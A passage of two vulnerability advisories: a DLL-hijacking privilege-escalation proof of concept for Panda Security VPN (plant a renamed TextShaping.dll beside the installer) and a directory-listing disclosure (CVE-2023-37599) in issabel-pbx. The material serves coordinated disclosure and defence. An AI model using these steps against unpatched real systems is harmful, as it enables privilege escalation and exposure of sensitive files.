}

1.  Use Visual Studio 2019.
2.  Compile the project in the DLL directory in x86 Release mode.
3.  Rename the compiled dll to TextShaping.dll and place it in the same directory as PANDAVPN.exe.
4.  Run PANDAVPN.exe to perform Panda Security VPN installation.

**0x06: Affected Products**

This vulnerability affects the following product:

*   Panda Security VPN Version < 15.14.8

**0x07: Credit information**

HeeChan Kim (@heegong123) of TeamH4C

**0x08: TimeLine**

*   2022/08/01 : First time contacted via Panda Security Email(secure@pandasecurity.com).
*   2022/08/10 : I recevied a file which is patched via Panda Security.
*   2023/07/05 : The vulnerability has been patched, and I have been notified that the vulnerability has been disclosed.
*   2023/07/09 : Request a CVE id via MITRE.

**0x09: Reference**

*   https://www.pandasecurity.com/en/homeusers/vpn/
*   https://www.pandasecurity.com/en/support/card?id=100080

This post is licensed under CC BY 4.0 by the author.

CVE-2023-37849: Local privilege escalation in Panda Dome VPN for Windows Installer

An issue in issabel-pbx v.4.0.0-6 allows a remote attacker to obtain sensitive information via the modules directory

**issabel-pbx 4.0.0-6 - Directory Listing**

**Description:** Issabel-pbx v.4.0.0-6 is vulnerable to Broken Access Control. The Directory Listing vulnerability allows any remote attacker to view the application's sensitive files within the modules directory of the application without any authorization.

**Vulnerable Product Version:** issabel-pbx 4.0.0-6

**Date:** 10/07/2023

**CVE:** CVE-2023-37599

**CVE Author:** Sahil Ojha

**Vendor Homepage:** https://www.issabel.org/

**Software Link:** https://github.com/IssabelFoundation/issabelPBX

**Tested on:** Windows

**Steps to reproduce:**

1.  Navigate to URL: https://{Issabel IP}/module. I found out that many important files of application can be accessed directly from this directory listing.

****************

Tag

#windows